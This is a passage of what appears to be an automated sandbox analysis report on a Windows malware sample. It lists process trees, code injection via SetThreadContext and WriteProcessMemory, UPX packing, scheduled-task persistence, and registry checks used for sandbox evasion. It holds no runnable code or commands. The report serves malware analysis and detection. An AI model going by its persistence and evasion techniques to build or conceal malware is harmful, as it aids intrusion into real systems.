pid Process 1224 c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe 2032 skotes.exe 4796 oVpNTUm.exe 2568 skotes.exe 2460 3omTNLZ.exe 2592 fmrsbin.exe 2132 Temp9YJWNJDD7ZMZ093IBVRL2OWLXE9UJ7XL.EXE 2400 6d5890a57c.exe 4336 483d2fa8a0d53818306efeb32d3.exe 3608 1da84c3340.exe 4084 d2YQIJa.exe 4380 3omTNLZ.exe 4748 c7ef445ed3.exe 6188 skotes.exe 6528 oVpNTUm.exe 6012 xlxlx.exe 2872 f194fe0c36.exe 5852 7741754b5d.exe 6972 2b2e2cbb7c.exe 5232 6349744b39.exe 6872 5567323d7a.exe 6648 457170dfca.exe 5000 4b2bea3bb2.exe 5920 18e34ec326.exe 6328 TempRSPGZQOVMRYPJWA926GQX6WJA8DATYL4.EXE 4212 skotes.exe -
Suspicious use of SetThreadContext 10 IoCs
description pid Process procid_target PID 2856 set thread context of 3456 2856 con12312211221.exe 125 PID 1244 set thread context of 3228 1244 monthdragon.exe 131 PID 1480 set thread context of 2860 1480 alex12112.exe 140 PID 2964 set thread context of 2748 2964 Ta3ZyUR.exe 144 PID 2952 set thread context of 3088 2952 7aencsM.exe 172 PID 4748 set thread context of 6276 4748 c7ef445ed3.exe 200 PID 5860 set thread context of 5992 5860 Bjkm5hE.exe 212 PID 3724 set thread context of 5260 3724 88e0f792cc.exe 220 PID 2872 set thread context of 4892 2872 f194fe0c36.exe 226 PID 5852 set thread context of 4568 5852 7741754b5d.exe 229 -
resource yara_rule behavioral2/files/0x0007000000023dd5-412.dat upx behavioral2/memory/464-442-0x00007FF892880000-0x00007FF8928A3000-memory.dmp upx behavioral2/memory/464-441-0x00007FF8983F0000-0x00007FF8983FF000-memory.dmp upx behavioral2/memory/464-447-0x00007FF8927A0000-0x00007FF8927D6000-memory.dmp upx behavioral2/memory/464-446-0x00007FF8927E0000-0x00007FF89280D000-memory.dmp upx behavioral2/memory/464-445-0x00007FF892860000-0x00007FF892879000-memory.dmp upx behavioral2/memory/464-444-0x00007FF8983D0000-0x00007FF8983DD000-memory.dmp upx behavioral2/memory/464-443-0x00007FF894980000-0x00007FF894999000-memory.dmp upx behavioral2/memory/464-449-0x00007FF894AF0000-0x00007FF894AFD000-memory.dmp upx behavioral2/memory/464-450-0x00007FF8928B0000-0x00007FF8928E3000-memory.dmp upx behavioral2/memory/464-452-0x00007FF88E6D0000-0x00007FF88E79D000-memory.dmp upx behavioral2/memory/464-451-0x00007FF87F2F0000-0x00007FF87F810000-memory.dmp upx behavioral2/memory/464-460-0x00007FF88FD50000-0x00007FF88FD62000-memory.dmp upx behavioral2/memory/464-459-0x00007FF87F100000-0x00007FF87F21C000-memory.dmp upx behavioral2/memory/464-458-0x00007FF88FAB0000-0x00007FF88FAD6000-memory.dmp upx behavioral2/memory/464-457-0x00007FF88F060000-0x00007FF88F0A3000-memory.dmp upx behavioral2/memory/464-466-0x00007FF88EF80000-0x00007FF88EFAE000-memory.dmp upx behavioral2/memory/464-465-0x00007FF87EEB0000-0x00007FF87F0F9000-memory.dmp upx behavioral2/memory/464-464-0x00007FF87EDF0000-0x00007FF87EEAC000-memory.dmp upx behavioral2/memory/464-463-0x00007FF88F1B0000-0x00007FF88F1D4000-memory.dmp upx behavioral2/memory/464-462-0x00007FF87F810000-0x00007FF87FDF9000-memory.dmp upx behavioral2/memory/464-456-0x00007FF892850000-0x00007FF89285B000-memory.dmp upx behavioral2/memory/464-487-0x00007FF88EF50000-0x00007FF88EF7B000-memory.dmp upx behavioral2/memory/464-455-0x00007FF892780000-0x00007FF892794000-memory.dmp upx behavioral2/memory/464-454-0x00007FF88F0F0000-0x00007FF88F177000-memory.dmp upx behavioral2/memory/464-453-0x00007FF87F220000-0x00007FF87F2EF000-memory.dmp upx behavioral2/memory/464-488-0x00007FF87F810000-0x00007FF87FDF9000-memory.dmp upx behavioral2/memory/464-512-0x00007FF88EF50000-0x00007FF88EF7B000-memory.dmp upx behavioral2/memory/464-525-0x00007FF88E6D0000-0x00007FF88E79D000-memory.dmp upx behavioral2/memory/464-524-0x00007FF88FAB0000-0x00007FF88FAD6000-memory.dmp upx behavioral2/memory/464-523-0x00007FF8928B0000-0x00007FF8928E3000-memory.dmp upx behavioral2/memory/464-522-0x00007FF894AF0000-0x00007FF894AFD000-memory.dmp upx behavioral2/memory/464-521-0x00007FF8927A0000-0x00007FF8927D6000-memory.dmp upx behavioral2/memory/464-520-0x00007FF8927E0000-0x00007FF89280D000-memory.dmp upx behavioral2/memory/464-519-0x00007FF892860000-0x00007FF892879000-memory.dmp upx behavioral2/memory/464-518-0x00007FF8983D0000-0x00007FF8983DD000-memory.dmp upx behavioral2/memory/464-517-0x00007FF894980000-0x00007FF894999000-memory.dmp upx behavioral2/memory/464-516-0x00007FF88EF80000-0x00007FF88EFAE000-memory.dmp upx behavioral2/memory/464-515-0x00007FF8983F0000-0x00007FF8983FF000-memory.dmp upx behavioral2/memory/464-514-0x00007FF892880000-0x00007FF8928A3000-memory.dmp upx behavioral2/memory/464-513-0x00007FF87EEB0000-0x00007FF87F0F9000-memory.dmp upx behavioral2/memory/464-511-0x00007FF87EDF0000-0x00007FF87EEAC000-memory.dmp upx behavioral2/memory/464-508-0x00007FF88F1B0000-0x00007FF88F1D4000-memory.dmp upx behavioral2/memory/464-507-0x00007FF88FD50000-0x00007FF88FD62000-memory.dmp upx behavioral2/memory/464-506-0x00007FF88F060000-0x00007FF88F0A3000-memory.dmp upx behavioral2/memory/464-505-0x00007FF87F100000-0x00007FF87F21C000-memory.dmp upx behavioral2/memory/464-503-0x00007FF892850000-0x00007FF89285B000-memory.dmp upx behavioral2/memory/464-502-0x00007FF892780000-0x00007FF892794000-memory.dmp upx behavioral2/memory/464-501-0x00007FF88F0F0000-0x00007FF88F177000-memory.dmp upx behavioral2/memory/464-500-0x00007FF87F220000-0x00007FF87F2EF000-memory.dmp upx behavioral2/memory/464-498-0x00007FF87F2F0000-0x00007FF87F810000-memory.dmp upx behavioral2/files/0x0007000000023dd1-424.dat upx behavioral2/files/0x0007000000023d8b-422.dat upx behavioral2/memory/464-419-0x00007FF87F810000-0x00007FF87FDF9000-memory.dmp upx -
Drops file in Windows directory 6 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe File created C:\Windows\Tasks\fmrsbin.job oVpNTUm.exe File opened for modification C:\Windows\Tasks\fmrsbin.job oVpNTUm.exe File created C:\Windows\Tasks\futors.job amnew.exe File created C:\Windows\Tasks\xlxlx.job oVpNTUm.exe File opened for modification C:\Windows\Tasks\xlxlx.job oVpNTUm.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral2/files/0x0007000000023d5a-272.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 8 IoCs
pid pid_target Process procid_target 3588 2856 WerFault.exe 123 408 1244 WerFault.exe 129 4412 1480 WerFault.exe 138 2192 2964 WerFault.exe 143 1048 2952 WerFault.exe 171 5336 5860 WerFault.exe 211 7044 6872 WerFault.exe 230 6976 5000 WerFault.exe 233 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 88e0f792cc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3omTNLZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 5567323d7a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 457170dfca.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7aencsM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Bjkm5hE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d67718582a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3omTNLZ.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language eb522d694c.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage eb522d694c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xlxlx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 73645cf365.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language monthdragon.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Ta3ZyUR.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d2YQIJa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1da84c3340.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language con12312211221.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language monthdragon.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language oVpNTUm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6349744b39.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempRSPGZQOVMRYPJWA926GQX6WJA8DATYL4.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language eb522d694c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c5859bfd97.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alex12112.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4b2bea3bb2.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 73645cf365.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language con12312211221.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 73645cf365.exe -
Checks processor information in registry 2 TTPs 28 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 7aencsM.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 5567323d7a.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 5567323d7a.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 4b2bea3bb2.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 4b2bea3bb2.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 7aencsM.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 2204 timeout.exe 5808 timeout.exe -
Enumerates system info in registry 2 TTPs 16 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe -
Kills process with taskkill 10 IoCs
pid Process 2460 taskkill.exe 4084 taskkill.exe 6952 taskkill.exe 6424 taskkill.exe 812 taskkill.exe 544 taskkill.exe 2208 taskkill.exe 2680 taskkill.exe 3784 taskkill.exe 4192 taskkill.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133844171421514382" chrome.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1752 schtasks.exe 5596 schtasks.exe 4780 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1224 c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe 1224 c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe 2032 skotes.exe 2032 skotes.exe 4796 oVpNTUm.exe 4796 oVpNTUm.exe 2568 skotes.exe 2568 skotes.exe 2460 3omTNLZ.exe 2460 3omTNLZ.exe 2460 3omTNLZ.exe 2460 3omTNLZ.exe 2460 3omTNLZ.exe 2460 3omTNLZ.exe 2352 powershell.exe 2352 powershell.exe 4796 oVpNTUm.exe 4796 oVpNTUm.exe 2040 powershell.exe 2592 fmrsbin.exe 2592 fmrsbin.exe 2040 powershell.exe 2132 Temp9YJWNJDD7ZMZ093IBVRL2OWLXE9UJ7XL.EXE 2132 Temp9YJWNJDD7ZMZ093IBVRL2OWLXE9UJ7XL.EXE 1824 powershell.exe 1824 powershell.exe 2132 Temp9YJWNJDD7ZMZ093IBVRL2OWLXE9UJ7XL.EXE 2132 Temp9YJWNJDD7ZMZ093IBVRL2OWLXE9UJ7XL.EXE 3088 powershell.exe 3088 powershell.exe 4972 powershell.exe 4972 powershell.exe 2400 6d5890a57c.exe 2400 6d5890a57c.exe 4336 483d2fa8a0d53818306efeb32d3.exe 4336 483d2fa8a0d53818306efeb32d3.exe 3608 1da84c3340.exe 3608 1da84c3340.exe 3456 con12312211221.exe 3456 con12312211221.exe 3456 con12312211221.exe 3456 con12312211221.exe 3228 monthdragon.exe 3228 monthdragon.exe 3228 monthdragon.exe 3228 monthdragon.exe 2860 alex12112.exe 2860 alex12112.exe 2860 alex12112.exe 2860 alex12112.exe 2748 Ta3ZyUR.exe 2748 Ta3ZyUR.exe 2748 Ta3ZyUR.exe 2748 Ta3ZyUR.exe 4084 d2YQIJa.exe 4084 d2YQIJa.exe 2040 eb522d694c.exe 2040 eb522d694c.exe 4084 d2YQIJa.exe 4084 d2YQIJa.exe 4084 d2YQIJa.exe 4084 d2YQIJa.exe 4380 3omTNLZ.exe 4380 3omTNLZ.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 14 IoCs
pid Process 5600 chrome.exe 5600 chrome.exe 5600 chrome.exe 6352 msedge.exe 6352 msedge.exe 6352 msedge.exe 6352 msedge.exe 5924 chrome.exe 5924 chrome.exe 5924 chrome.exe 2004 msedge.exe 2004 msedge.exe 2004 msedge.exe 2004 msedge.exe -
Suspicious use of AdjustPrivilegeToken 42 IoCs
description pid Process Token: SeDebugPrivilege 2352 powershell.exe Token: SeDebugPrivilege 2040 powershell.exe Token: SeDebugPrivilege 1824 powershell.exe Token: SeDebugPrivilege 2132 Temp9YJWNJDD7ZMZ093IBVRL2OWLXE9UJ7XL.EXE Token: SeDebugPrivilege 3088 powershell.exe Token: SeDebugPrivilege 4972 powershell.exe Token: SeDebugPrivilege 2208 taskkill.exe Token: SeDebugPrivilege 2680 taskkill.exe Token: SeDebugPrivilege 3784 taskkill.exe Token: SeDebugPrivilege 4192 taskkill.exe Token: SeDebugPrivilege 2460 taskkill.exe Token: SeDebugPrivilege 4080 firefox.exe Token: SeDebugPrivilege 4080 firefox.exe Token: SeShutdownPrivilege 5600 chrome.exe Token: SeCreatePagefilePrivilege 5600 chrome.exe Token: SeDebugPrivilege 5480 powershell.exe Token: SeShutdownPrivilege 5600 chrome.exe Token: SeCreatePagefilePrivilege 5600 chrome.exe Token: SeShutdownPrivilege 5600 chrome.exe Token: SeCreatePagefilePrivilege 5600 chrome.exe Token: SeDebugPrivilege 6672 powershell.exe Token: SeShutdownPrivilege 5600 chrome.exe Token: SeCreatePagefilePrivilege 5600 chrome.exe Token: SeShutdownPrivilege 5600 chrome.exe Token: SeCreatePagefilePrivilege 5600 chrome.exe Token: SeDebugPrivilege 7120 powershell.exe Token: SeShutdownPrivilege 5600 chrome.exe Token: SeCreatePagefilePrivilege 5600 chrome.exe Token: SeShutdownPrivilege 5600 chrome.exe Token: SeCreatePagefilePrivilege 5600 chrome.exe Token: SeDebugPrivilege 5228 C3hYpvm.exe Token: SeDebugPrivilege 5232 6349744b39.exe Token: SeDebugPrivilege 4084 taskkill.exe Token: SeShutdownPrivilege 5924 chrome.exe Token: SeCreatePagefilePrivilege 5924 chrome.exe Token: SeDebugPrivilege 6952 taskkill.exe Token: SeDebugPrivilege 812 taskkill.exe Token: SeDebugPrivilege 6424 taskkill.exe Token: SeDebugPrivilege 544 taskkill.exe Token: SeDebugPrivilege 5928 powershell.exe Token: SeDebugPrivilege 2424 firefox.exe Token: SeDebugPrivilege 2424 firefox.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1224 c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe 2004 d67718582a.exe 2004 d67718582a.exe 2004 d67718582a.exe 2040 eb522d694c.exe 2040 eb522d694c.exe 2040 eb522d694c.exe 2040 eb522d694c.exe 2040 eb522d694c.exe 2040 eb522d694c.exe 2040 eb522d694c.exe 4080 firefox.exe 4080 firefox.exe 4080 firefox.exe 4080 firefox.exe 4080 firefox.exe 4080 firefox.exe 4080 firefox.exe 4080 firefox.exe 4080 firefox.exe 4080 firefox.exe 4080 firefox.exe 4080 firefox.exe 4080 firefox.exe 4080 firefox.exe 4080 firefox.exe 4080 firefox.exe 4080 firefox.exe 4080 firefox.exe 4080 firefox.exe 4080 firefox.exe 4080 firefox.exe 2040 eb522d694c.exe 2040 eb522d694c.exe 2040 eb522d694c.exe 2040 eb522d694c.exe 5600 chrome.exe 5600 chrome.exe 5600 chrome.exe 5600 chrome.exe 5600 chrome.exe 5600 chrome.exe 5600 chrome.exe 5600 chrome.exe 5600 chrome.exe 5600 chrome.exe 5600 chrome.exe 5600 chrome.exe 5600 chrome.exe 5600 chrome.exe 5600 chrome.exe 5600 chrome.exe 5600 chrome.exe 5600 chrome.exe 5600 chrome.exe 5600 chrome.exe 5600 chrome.exe 5600 chrome.exe 5600 chrome.exe 5600 chrome.exe 5600 chrome.exe 5600 chrome.exe 6352 msedge.exe 6352 msedge.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 2004 d67718582a.exe 2004 d67718582a.exe 2004 d67718582a.exe 2040 eb522d694c.exe 2040 eb522d694c.exe 2040 eb522d694c.exe 2040 eb522d694c.exe 2040 eb522d694c.exe 2040 eb522d694c.exe 2040 eb522d694c.exe 4080 firefox.exe 4080 firefox.exe 4080 firefox.exe 4080 firefox.exe 4080 firefox.exe 4080 firefox.exe 4080 firefox.exe 4080 firefox.exe 4080 firefox.exe 4080 firefox.exe 4080 firefox.exe 4080 firefox.exe 4080 firefox.exe 4080 firefox.exe 4080 firefox.exe 4080 firefox.exe 4080 firefox.exe 4080 firefox.exe 4080 firefox.exe 4080 firefox.exe 2040 eb522d694c.exe 2040 eb522d694c.exe 2040 eb522d694c.exe 2040 eb522d694c.exe 536 73645cf365.exe 536 73645cf365.exe 536 73645cf365.exe 536 73645cf365.exe 536 73645cf365.exe 536 73645cf365.exe 1640 c25e86d7df.exe 1640 c25e86d7df.exe 1640 c25e86d7df.exe 536 73645cf365.exe 2424 firefox.exe 2424 firefox.exe 2424 firefox.exe 2424 firefox.exe 2424 firefox.exe 2424 firefox.exe 2424 firefox.exe 2424 firefox.exe 2424 firefox.exe 2424 firefox.exe 2424 firefox.exe 2424 firefox.exe 2424 firefox.exe 2424 firefox.exe 2424 firefox.exe 2424 firefox.exe 2424 firefox.exe 2424 firefox.exe 2424 firefox.exe 2424 firefox.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 4080 firefox.exe 5228 C3hYpvm.exe 2424 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1224 wrote to memory of 2032 1224 c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe 86 PID 1224 wrote to memory of 2032 1224 c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe 86 PID 1224 wrote to memory of 2032 1224 c8f32e8993e9fe0df54fef631f7df4d72969dd3c97f9f545d4d333b30fe7109b.exe 86 PID 2032 wrote to memory of 4796 2032 skotes.exe 87 PID 2032 wrote to memory of 4796 2032 skotes.exe 87 PID 2032 wrote to memory of 4796 2032 skotes.exe 87 PID 2032 wrote to memory of 2460 2032 skotes.exe 89 PID 2032 wrote to memory of 2460 2032 skotes.exe 89 PID 2032 wrote to memory of 2460 2032 skotes.exe 89 PID 2032 wrote to memory of 2004 2032 skotes.exe 91 PID 2032 wrote to memory of 2004 2032 skotes.exe 91 PID 2032 wrote to memory of 2004 2032 skotes.exe 91 PID 2004 wrote to memory of 4364 2004 d67718582a.exe 92 PID 2004 wrote to memory of 4364 2004 d67718582a.exe 92 PID 2004 wrote to memory of 4364 2004 d67718582a.exe 92 PID 2004 wrote to memory of 2540 2004 d67718582a.exe 93 PID 2004 wrote to memory of 2540 2004 d67718582a.exe 93 PID 2004 wrote to memory of 2540 2004 d67718582a.exe 93 PID 4364 wrote to memory of 4780 4364 cmd.exe 95 PID 4364 wrote to memory of 4780 4364 cmd.exe 95 PID 4364 wrote to memory of 4780 4364 cmd.exe 95 PID 2540 wrote to memory of 2352 2540 mshta.exe 96 PID 2540 wrote to memory of 2352 2540 mshta.exe 96 PID 2540 wrote to memory of 2352 2540 mshta.exe 96 PID 2032 wrote to memory of 4836 2032 skotes.exe 98 PID 2032 wrote to memory of 4836 2032 skotes.exe 98 PID 2032 wrote to memory of 4836 2032 skotes.exe 98 PID 4836 wrote to memory of 4520 4836 cmd.exe 100 PID 4836 wrote to memory of 4520 4836 cmd.exe 100 PID 4836 wrote to memory of 4520 4836 cmd.exe 100 PID 4520 wrote to memory of 2204 4520 cmd.exe 102 PID 4520 wrote to memory of 2204 4520 cmd.exe 